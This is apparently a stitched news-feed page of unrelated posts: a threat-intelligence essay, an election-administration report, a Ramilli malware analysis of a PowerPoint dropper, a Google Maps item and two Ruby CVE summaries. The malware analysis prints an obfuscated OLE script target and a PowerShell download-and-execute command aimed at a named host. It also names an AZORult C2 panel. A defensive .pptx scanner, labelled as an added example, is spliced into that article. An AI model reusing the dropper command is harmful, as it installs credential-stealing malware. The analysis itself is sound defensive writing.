Privacy is perhaps the biggest obstacle and area of concern when using social media as a source of cyber threat intelligence.

Opponents of the use of social media in threat intelligence argue that privacy should be upheld regardless of whether the information being collected is from private or public profiles, even though posts that come from public profiles are technically considered open source information.

Interestingly, the privacy policies of social media websites such as Facebook and Twitter only ensure privacy to a certain extent, stating that they uphold the right to access, collect, and share user account information if it is believed that such information or actions support illegal activities or could cause harm to oneself or the public. For those concerned about privacy, the question now becomes, “How often do law enforcement, intelligence communities, and social media officials actually monitor my account to detect such activity, and how much information is actually being collected?”

The answer to this question will vary depending on who is collecting that information. But without some degree of monitoring over social media environments, security is weakened and threat response becomes reactive rather than proactive. Because of this, there will always be a debate regarding whether the desire for privacy outweighs the need for security.

Validity and Reliability

Once the desired information is collected from social media, it is moved through the processing stage of the threat intelligence lifecycle. Before analysis and production, raw data collected from social media will undergo some preparation such as decryption, language translation, cultural context application, data reduction, and bias identification.

Unfortunately, the tools and techniques used during this stage are new and often struggle to meet evidence standards such as producing representative datasets, providing credible interpretation, and validating information to avoid fake data. The failure to meet these standards heightens the risk of producing false positives or false negatives. Additionally, because the nature of social media environments allows users to modify and delete content as they please, information posted and shared on social media should be treated as time sensitive in order to properly assess the reliability of information.

One way in which these challenges can be addressed is through information substantiation. In other words, when threat intelligence is produced from information found on social media, the new intelligence should be cross-referenced with existing intelligence to check for false data, tampered information, analyst biases, and any other possible impurities that may discredit its genuine value.

Is Intelligence Derived From Social Media Valuable?

When the challenges of social media collection are properly addressed to ensure privacy protection, validity, and reliability, the answer is yes — intelligence derived from social media can be extremely valuable. Information collected from social media, like all other information, needs to go through the processing and analysis stages of the threat intelligence lifecycle before yielding actionable results.

Once these stages are complete, the resulting intelligence can be used by decision makers to direct plans for threat prevention, mitigation, and recovery. The use of social media in developing threat intelligence for such decision-making processes is still evolving and as a result, privacy, validity, and reliability challenges are still prevalent. To address these challenges, a basis for regulation, standards, and oversight needs to be established to ensure the misuse of social media in threat intelligence does not occur.

The existence of these challenges does not devalue intelligence derived from social media, but instead suggests that such intelligence is most valuable when used to support pre-existing and ongoing assessments.


Krysta Horocofsky

Krysta Horocofsky is an associate cyber threat analyst at Recorded Future.

The post Threat Analyst Insights: Discovering the Value of Threat Intelligence From Social Media appeared first on Recorded Future.


Fallout From Election Day Chaos Continues in Indiana’s Porter County

Agents from the FBI walked into an office building in the town of Valparaiso, in Porter County, Indiana, last Thursday. County officials had called them for help.

Two full days after the election, ballots for local races still had not been counted. Final election results weren’t released until early the next morning. The delays have caused alarm among local politicians and angered some voters and poll workers, who are calling on the county clerk to resign. More than a week later, one county council race is still too close to call — hanging on a margin of just 15 votes.

Since last week’s elections, reports have come in that raise concerns about alleged efforts to suppress and/or manipulate votes across the country, particularly in places like Georgia and Florida. Accounts from local poll workers and voters on Twitter and in the news indicated a broader national breakdown of an overwhelmed electoral system: polling places that ran out of supplies, lines much too long for the elderly or chronically ill to wait in, malfunctioning machines, and even instances where some machines changed votes from one candidate to another. (President Donald Trump and some other Republican politicians, meanwhile, have amplified unsubstantiated claims of widespread voter fraud.)

But in Porter County, the logistical problems were so bad that local officials felt they needed to call for outside help getting to the bottom of things. And as in many other places, it’s not clear whether the issues were caused by politics, mismanagement, or some messy combination of both.

“My concern was more about the lack of organization, the lack of planning, the lack of communication, quite frankly,” said Vicki Urbanik, a Democratic incumbent who was re-elected as county auditor. “Clearly they dropped the ball on this.”

This year, the county’s three-person election board voted to transfer administration of elections from the Voter Registration Office to the county clerk’s office, mirroring the way other counties in the state run elections. But Urbanik and other Democrats, as well as Republicans, say that the change caused unusual disruptions in voting this year.

“I will say that [in] most counties that I’m aware of in Indiana, the clerk’s office actually does run the elections. But this represented a real change here in Porter County, because the Voter Registration Office always ran the elections,” Urbanik explained.

County Clerk Karen Martin was one of the board’s two Republican members who voted in favor of the transition; the Democrat, J.J. Stankiewicz, opposed it. Martin was Urbanik’s Republican opponent for county auditor this year. None of the board members responded to multiple requests for comment. Reached by phone, a deputy in Martin’s office declined to comment.

Martin was on the election board for eight years, Urbanik said. “So, in some people’s minds, the switch really should not have been that big of a deal, in terms of disruption to the election process.” But, she added, “when the Voter Registration Office ran the elections, we never had the problems that we experienced like we had this year.”

Porter County Clerk and Election Board member Karen Martin. Press conference held at noon Thursday outside the voter registration department on the lower level of the Porter County Administration Center in Valparaiso.

Porter County Clerk Karen Martin at a press conference at the Porter County Administration Center on Nov. 8, 2018 in Valparaiso, Ind.

Photo: Tony V. Martin/Courtesy of Times of Northwest Indiana

At least 13 polls in Porter County did not open until between one and two hours after the slated 6 a.m. start — and one poll opened two and a half hours late.

“I do know for a fact the people left,” Urbanik said. Other poll workers independently confirmed this in interviews with The Intercept. A local Republican judge had to issue an order — requested by the county election board and Indiana’s Democratic State Central Committee, and opposed by the state GOP — to keep 12 of those locations open late so voters could make up for the time lost.

On the morning of the election, more than 18,000 absentee and early voter ballots had not yet been sorted for delivery to designated polling places, where they would be tabulated alongside in-person votes. Sheriffs reportedly delivered the missing ballots at 6 a.m., when polls were supposed to open. (Another court order was issued later that day to ensure absentee votes were counted as normal rather than provisional ballots, which are tallied the next day.)

Several voters who requested absentee ballots never received them, Drew Wenger told The Intercept. He chairs the Valparaiso Democratic Committee, which called Tuesday for state police “to investigate any potential wrongdoing connected to the 2018 Porter County election fiasco.” One 85-year-old woman who voted absentee in every election, Wenger said, didn’t receive her ballot for more than two and a half weeks after her initial request. That was only after she inquired in person with the clerk’s office about the delay.

By county law, two inspectors — one from each party — are appointed to monitor polls on each election. But this year, there weren’t enough inspectors, and when polls were supposed to open, several locations still didn’t have their team assembled.

“My husband and I had been contacting Republicans the day before by phone to try and get the gap filled that there weren’t enough Republican inspectors to run the election,” said Candace Shaw, whose husband, Democrat Frank Szczepanski, failed to unseat the local state representative, Ed Soliday, in Indiana’s 4th District. Soliday has himself called for the Indiana secretary of state’s office to investigate what happened in Porter County.

A self-described political junkie, Shaw has been deeply involved in Indiana politics for years, working polls and coordinating poll staffers on Election Day. She offered that growing up, she identified as a Republican and was vice chair of her local young Republicans committee, until she began to study political science in college and re-evaluated her political views. She said most of her family voted for Trump and remains “very, very Republican.” Despite posturing between the state parties on each side, the mishandling of the election isn’t a partisan issue, Shaw said. “I’m friends with a lot of Republicans here in Porter County, and a lot of them are really upset as well about what happened.”

On top of the absence of coordination and communication, poll workers cited myriad technical difficulties. “At 6am the ballot boxers weren’t working. Inspectors were still MIA. We couldn’t open. My stomach sank. I was trying to do something good and now I’d probably be on the local evening news,” poll worker Michelle Senderhauf wrote in a viral thread posted last week on Twitter. She also echoed Shaw’s account, saying that at her polling place, inspectors appointed by each party to monitor voting were not present.

The clerk’s office had also listed the incorrect address for one precinct, and the local newspaper reprinted the error. When voters from that precinct arrived, mistakenly, at Senderhauf’s polling place, workers didn’t have ballots for them. Senderhauf had to call the election hotline for guidance and redirect voters to the correct location.

Senderhauf told The Intercept that lack of training played a major part in the understaffing of precincts. Poll workers didn’t receive training until less than two weeks before election day. “Classes were announced last minute or would only be during the work day. I’m not surprised people refused to show up,” she wrote in an email. “Even though I watched the online training videos and read through the dense state election manual, I didn’t feel confident at all about what I was going to be doing on Election Day. … The incredibly kind and patient woman who was a clerk with me basically gave me on the job training.”

She added that “the state and county have standard procedures, though, and it sure seems that if those procedures had been followed, much of the chaos that day would have been avoided. I can’t help but think that disorganization and ineptitude caused the problems I saw in Porter County on Election Day. I certainly hope it wasn’t done out of malice.”

Other poll workers and county officials interviewed by The Intercept say the problems were not merely a matter of the clerk’s office being unprepared and overwhelmed, and placed the blame squarely on Martin.

Election board member Stankiewicz raised concerns as early as October 31, at a board meeting, that polling locations would not open on time because inspectors had not yet been assigned. “And nothing was done,” Wenger said.

At 1 a.m. the day after the election, the Northwest Indiana Times reported that poll workers were sitting on the floor of the county courthouse counting early and absentee ballots that were delivered late. That situation was avoidable, Shaw argues.

“We did not want to have 18,000 early voters disenfranchised just because of what the clerk chose to do,” Shaw said. “Those are choices that she made.”

The election fiasco has led to calls for Martin to resign. The clerk has been difficult to reach in the days following the election; she was most recently seen hiding behind a voter at an election board briefing, a local affiliate of CBS Chicago reported.

The FBI confirmed that the Porter County Board of Commissioners contacted them regarding the election, but could not comment on any investigation. “The FBI is always willing to accept information, complaints and tips from public officials and community members,” Chris Bavender, public affairs officer for the FBI’s field office in Indianapolis, wrote in an email to The Intercept. “Per DOJ policy I can neither confirm nor deny an investigation.”

Members of the Porter County Board of Commissioners did not respond to multiple requests for comment. The county is set to verify vote totals Friday.

Urbanik, Martin’s challenger, believed that the elections were clearly mismanaged. While she made clear that she did not suspect a deliberate attempt at voter suppression, as a former reporter who observed elections in the county for 25 years, she said it was not out of the question.

“When you look at the polling sites that were not adequately staffed, and that they didn’t open on time, most of them were in one particular area. Which tends to vote Democrat. Not necessarily Democrat, but it tends to be Democrat,” Urbanik told The Intercept in a phone interview.

Shaw called the chaos that ensued in Porter County and elsewhere “completely un-American.”

“It goes against everything that I’ve ever been brought up to believe. Even when I was a Republican, compared to now that I’m a Democrat,” she said. “It’s against everything that we believe about the way that our voting system is supposed to work.”

The post Fallout From Election Day Chaos Continues in Indiana’s Porter County appeared first on The Intercept.

Using Microsoft Powerpoint as Malware Dropper

Marco Ramilli, founder and CEO at cyber security firm Yoroi, explains how attackers use Microsoft Powerpoint as a malware dropper.

Nowadays Microsoft Office documents are often used to propagate malware, acting like dynamic droppers. Microsoft Excel embedding macros or Microsoft Word with user actions (like links or external OLE objects) are the main players in this “Office Dropping Arena”. When I figured out that a Microsoft Powerpoint was used to drop and to execute a malicious payload I was amazed; it’s not so common (at least in my personal experience), so I decided to write a little bit about it.
The “attack path” is very close to what has been observable in modern threats for years: an email campaign with an attached document and actionable text in it. In the beginning, the Microsoft Powerpoint presentation looked like a blank white page, but it was performing a very interesting and hidden connection to hxxps://a.doko.moe/wraeop.sct.

Analyzing the Microsoft Powerpoint structure, the following slide structure caught my eye:

Stage 1: Microsoft PowerPoint Dropping Website

An external OLE object (compatibility 2006) was referenced with the following value:

Target="%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2F%61%2E%64oko%2Emo%65%2Fwr%61%65o%70%2E%73%63%74"

Decoded from hex to ASCII, that string is much more readable:

scrIPT:hxxps://a.doko.moe/wraeop.sct
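
A defender-side check for the Stage 1 trick described above, as an added example that is not part of the original analysis: it scans the relationship parts of a .pptx for external targets whose percent-decoded value starts with a script-style scheme, or that hide plain letters behind %XX escapes. The sample document, the example.invalid host, the scheme list and all function names are constructed for illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import unquote

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Assumption: a short list of schemes that hand the target to a script engine.
SUSPICIOUS_SCHEMES = ("script", "javascript", "vbscript")


def encoded_alnum_count(raw):
    """Count %XX escapes that hide plain ASCII letters or digits.

    Letters and digits never need escaping in a URL, so encoding them is a
    strong hint that the target was obfuscated on purpose.
    """
    hits = 0
    for hex_pair in re.findall(r"%([0-9A-Fa-f]{2})", raw):
        value = int(hex_pair, 16)
        if value < 128 and chr(value).isalnum():
            hits += 1
    return hits


def defang(url):
    """Rewrite http/https as hxxp/hxxps so reports are not clickable."""
    return re.sub(r"(?i)http", "hxxp", url)


def scan_pptx(data):
    """Return one finding per suspicious external relationship in a .pptx."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            # For untrusted samples, parse with a hardened XML library
            # such as defusedxml instead of the stdlib parser.
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                raw = rel.get("Target", "")
                decoded = unquote(raw)
                scheme = decoded.split(":", 1)[0].lower()
                hidden = encoded_alnum_count(raw)
                if scheme in SUSPICIOUS_SCHEMES or hidden:
                    findings.append({
                        "part": part,
                        "rel_id": rel.get("Id"),
                        "scheme": scheme,
                        "hidden_alnum": hidden,
                        "decoded": defang(decoded),
                    })
    return findings


def build_sample_pptx():
    """Constructed sample: one obfuscated script: target, two benign rels."""
    base = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/'
        '2006/relationships">'
        f'<Relationship Id="rId1" Type="{base}slideLayout" '
        'Target="../slideLayouts/slideLayout1.xml"/>'
        f'<Relationship Id="rId2" Type="{base}oleObject" '
        'Target="%73%63%72%49%50%54:%68%74%74%70%73%3A%2F%2Fexample'
        '%2Einvalid%2Fstage2%2E%73%63%74" TargetMode="External"/>'
        f'<Relationship Id="rId3" Type="{base}hyperlink" '
        'Target="https://example.invalid/docs" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_pptx(build_sample_pptx()):
        print(finding)
```

The ordinary external hyperlink (rId3) is not reported, so the check can run over a mail gateway's attachment queue without flagging every linked presentation.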

An external object is downloaded and executed like a script on the victim machine. The downloaded file (wraeop.sct) contains JavaScript code that forms Stage 2 of the infection process. It is shown as follows:

Stage 2: Executed Javascript

Decoding the 3.6K script makes it clear that one more stage is involved in the infection process. The following code is the execution path that drives Stage 2 to Stage 3.

var run = new ActiveXObject(‘WSCRIPT.Shell’).Run(powershell  -nologo -executionpolicy bypass -noninteractive -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‘http://batteryenhancer.com/oldsite/Videos/js/DAZZI.exe’, ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’); Start-Process ‘%temp%/VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe’ ); 

The script downloads a file named AZZI.exe and saves it under a new name, VRE1wEh9j0mvUATIN3AqW1HSNnyir8id.exe, in a system temporary directory in order to run it. The downloaded PE executable is a .NET file created by ExtendedScript Toolkit (according to compilation time) on 2018-11-13 15:21:54 and submitted to VirusTotal a few hours later.

Stage 3: .NET file

The third stage uses an internal resource (which happens to be an image) to read and execute additional code: the final payload, or Stage 4. In other words, Stage 3 reads an image stored as an internal resource of the PE file, then extracts and executes it. The final payload looks like AZORult malware. The evidence comes from traffic analysis, where the identified pattern sends (HTTP POST) data on browser history and specifically crafted files under User – AppData to specific PHP pages. Moreover, the command and control admin panel (hxxps://ominigrind.ml/azzi/panel/admin.php) looks like AZORult V3.

Stage4: AZORult evidence

I hope you had fun with this, I did! It was super interesting to see the attacker’s creativity and the way they act to include malicious content in Office documents. Microsoft should probably take care of this and try to filter or to ask permission before including external content, but still, this will not be a complete solution (from my personal point of view). A deeper and more invasive action would be needed to check the remote content. Stay tuned!

Indicators of Compromise (IoCs) for the malicious code are reported in the original analysis published by Marco Ramilli in his blog.

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (@ National Institute of Standards and Technology, Security Division), where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.

I have experience in security testing, since I have been performing penetration testing on several US electronic voting systems. I’ve also been in charge of testing the uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies, where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experience by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence centers I’ve ever experienced! Now I technically lead Yoroi, defending our customers and strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – Microsoft Powerpoint, malware)

The post Using Microsoft Powerpoint as Malware Dropper appeared first on Security Affairs.


Google Maps Has Introduced So Many New Features and Design Changes in Recent Months That Getting Directions On It is Becoming an Increasingly Challenging Task

Earlier this week, Google announced it is bringing business messaging to Maps, the latest in a myriad of features it has introduced to its mapping platform in recent months. A business that wants to participate will need to use Google's "My Business" verification system and its associated app to send and receive messages. While that could prove useful to a number of businesses and customers, it has raised a concern as well. From a report: But that leads me to my third feeling: what the heck is going on with Google Maps? It is becoming overburdened with so many features and design changes that it's becoming harder and harder to just get directions in it. There's Group Planning, there's a social-esque "follow" button for local businesses, you can share your ETA, there's a redesigned "Explore" section, and there's almost no way to get the damn thing to show you a cross street near your destination without three full minutes of desperate pinching and zooming and re-zooming. It's becoming bloated, is what I'm saying. It's Google's equivalent of Big Blue, as Facebook nicknames its flagship app that does a thousand things across countless strange nooks and crannies. It's as though Google wants to kill off Yelp once and for all, but can't let anybody notice how hard it's trying to do that so it just slow rolls those things into Google Maps instead.

Read more of this story at Slashdot.

CVE-2018-16396

An issue was discovered in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. It does not taint strings that result from unpacking tainted strings with some formats.

CVE-2018-16395

An issue was discovered in the OpenSSL library in Ruby before 2.3.8, 2.4.x before 2.4.5, 2.5.x before 2.5.2, and 2.6.x before 2.6.0-preview3. When two OpenSSL::X509::Name objects are compared using ==, depending on the ordering, non-equal objects may return true. When the first argument is one character longer than the second, or the second argument contains a character that is one less than a character in the same position of the first argument, the result of == will be true. This could be leveraged to create an illegitimate certificate that may be accepted as legitimate and then used in signing or encryption operations.